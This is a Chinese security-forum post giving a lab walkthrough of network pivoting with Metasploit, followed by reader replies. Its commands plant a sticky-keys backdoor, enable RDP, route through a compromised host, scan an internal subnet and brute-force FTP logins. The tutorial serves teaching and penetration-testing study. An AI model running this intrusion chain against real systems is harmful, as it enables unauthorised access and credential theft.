用户
搜索

[原创] FTP枢轴攻击

  • TA的每日心情
    奋斗
    半小时前
  • 签到天数: 37 天

    连续签到: 3 天

    [LV.5]常住居民I

    i春秋-脚本小子

    Rank: 2

    6

    主题

    22

    帖子

    366

    魔法币
    收听
    0
    粉丝
    0
    注册时间
    2015-11-20
    发表于 2017-10-3 22:58:27 2722464
    枢轴  是通过枢轴(中心点)帮助进入无法访问的网络的技术。简单来说,这是攻击者可以利用属于不同网络的那些系统的攻击。对于这种攻击,攻击者需要利用主服务器来帮助攻击者将自己添加到本地网络中,然后攻击者就可以将客户端系统进行定位,然后攻击。

    实验环境要求:

    攻击机:Kali Linux
    枢纽机:具有两个网络接口的windows系统
    目标机器:windows7(允许FTP服务)
    利用枢纽机
    使用exploit MS17-010或多种处理程序来攻击枢纽机器并绕过其UAC来实现管理员权限。
    sessions
    从给定的截图中可以确认我拥有的枢纽机器(192.168.0.101)是meterpreter session 1。
    2.png
    发起粘滞键攻击
    这里我需要漏洞利用来发起粘性攻击
    use post / windows / manage /sticky_keys
    msf post(sticky_keys)> setsession 1
    msf post(sticky_keys)> exploit
    它已经在枢纽机器中成功发起了粘性攻击,现在我们将利用它来建立与目标FTP服务器的连接。
    3.png
    启用RDP服务
    打开meterpreter session1并键入以下命令,这将启用远程桌面服务在枢转机器中。
    Meterpreter>run getgui -e
    4.png
    验证枢轴的网络接口
    通过以下命令检查网络接口:
    Meterpreter> ifconfig
    从给定的图像可以在旋转的系统观察两个网络接口,  1 日 为IP  192.168.0.101 通过攻击者连接和  2 次  为IP  192.168.100.102  通过FTP服务器(目标)连接。
    5.png
    使用autoroute后利用
    因为攻击者属于  192.168.0.1  接口,客户端属于  192.168.100.0  接口,因此除非攻击者c处于同一个网络连接,否则不可能直接对客户端进行攻击。为了实现192.168.100.0网络攻击者需要运行 后利用模块  “autoroute”。
    该模块通过现有的Meterpreter会话管理会话路由。它可以使其他模块在连接到命名的NETWORK和SUBMASK时通过受感染的主机进行“转发”。Autoadd将从路由表和接口列表中搜索有效子网的会话,然后向其添加路由。默认值将添加一个默认路由,使得MSF路由表中未指定的所有TCP / IP流量将在枢转时路由通过会话。
    use post / multi / manage /autoroute
    msf post(autoroute)>setsession 1
    msf post(autoroute)> exploit
    6.png
    使用Ping扫描后利用
    该模块将使用包含操作系统的ping命令执行IPv4 ping扫描。
    use post / windows / gather / ping_sweep
    msf post(ping_sweep)> setrhosts 192.168.100.1-110
    msf post(ping_sweep)>setsession 1
    msf post(ping_sweep)> exploit
    在这里我们找到了一个新的主机IP  192.1668.100.103  ,如图所示。我们对本机上激活的服务执行TCP端口扫描。
    7.png
    使用TCP端口扫描 后利用
    此模块通过在每个端口上执行完整的TCP连接来枚举打开的TCP服务。这不需要源计算机的管理权限,这在枢纽时可能很有用。
    use auxiliary/ scanner / portscan / tcp
    msf auxiliary(tcp) > set ports 21
    msf auxiliary(tcp) > set rhosts192.168.100.103
    msf auxiliary(tcp) > set thread 10
    msf auxiliary(tcp) >exploit
    从给定的截图你可以观察  21端口是开放的,我们知道端口21用于FTP服务。
    8.png
    FTP暴力登录
    该模块将测试一系列机器上的FTP登录并报告成功登录。如果您加载了数据库插件并连接到数据库,则该模块将记录成功的登录和主机,以便您可以跟踪您的访问。
    use auxiliary/scanner/ftp/ftp_login
    msf auxiliary(ftp_login) > set rhosts192.168.100.103
    msf auxiliary(ftp_login) > setuser_file /root/Desktop/user.txt
    msf auxiliary(ftp_login) > setpass_file /root/Desktop/pass.txt
    msf auxiliary(ftp_login) > setstop_on_success true
    msf auxiliary(ftp_login) > exploit
    从给定的截图可以看出,它显示了用户名:raj  和  密码:123 可以进行登录的匹配组合  。
    9.png
    通过RDP连接到枢轴机器
    在kali Linux中打开新终端,并键入以下命令,通过RDP服务与枢纽机器连接
      rdesktop 192.168.0.101
    10.png
    如果你还记得之前我们有进行粘性攻击,那么当你按下5次Shift键时,会在登录屏幕上打开命令提示符。
    现在按5次Shift键,然后您将获得命令提示符,并键入“ start iexplore.exe ”,这将启动InternetExplore。
    11.png
    连接FTP服务器
    在浏览器中输入并执行FTP连接的以下URL:
    ftp://192.168.100.103
    现在输入我们通过FTP登录暴力攻击即raj:123发现的账号与密码
    12.png
    我们通过枢纽机器与FTP服务器成功连接。
    13.png

    参考来源:http://www.hackingarticles.in/ftp-pivoting-rdp/



    1.png
    神裤衩 发表于 2017-10-12 17:05
    有个问题问下楼主。既然已经有枢纽机器的管理员权限了,为什么不直接远程连接到该服务器做内网堡垒机在进行 ...

    思路是很多的,但是内网环境也是复杂的,并不局限于文章写的,通过枢纽机器去进行渗透,尽量去扩展。
    使用道具 举报 回复
    发表于 2017-10-12 17:05:05
    有个问题问下楼主。既然已经有枢纽机器的管理员权限了,为什么不直接远程连接到该服务器做内网堡垒机在进行继续渗透呢?
    使用道具 举报 回复
    发表于 2017-10-4 21:29:33
    支持楼主,感谢分享.回复查看!!...
    使用道具 举报 回复
    发表于 2017-10-7 14:03:31
    支持楼主,感谢分享.回复查看
    使用道具 举报 回复
    学习  感谢分享
    使用道具 举报 回复
    支持楼主,感谢分享.回复查看
    使用道具 举报 回复
    发表于 2017-10-4 21:38:17

    支持楼主,感谢分享.
    使用道具 举报 回复
    发表于 2017-10-4 21:58:37
    回复查看
    使用道具 举报 回复
    发表于 2017-10-4 22:33:55
    支持楼主,感谢分享.
    使用道具 举报 回复
    看起来很厉害的样子
    使用道具 举报 回复
    发表于 2017-10-4 22:44:22
    6666666666666666
    使用道具 举报 回复
    发表于 2017-10-4 23:47:32
    学习一下
    使用道具 举报 回复
    发表于 2017-10-5 10:45:18
    FTP枢轴攻击
    使用道具 举报 回复
    发表于 2017-10-5 11:05:02
    感谢楼主分享,666666
    使用道具 举报 回复
    发表于 2017-10-5 13:41:16
    感谢分享!
    使用道具 举报 回复
    发表于 2017-10-5 16:38:47
    666666666666666
    使用道具 举报 回复
    发表于 2017-10-5 17:48:00
    666666666666
    使用道具 举报 回复
    12下一页
    发新帖
    您需要登录后才可以回帖 登录 | 立即注册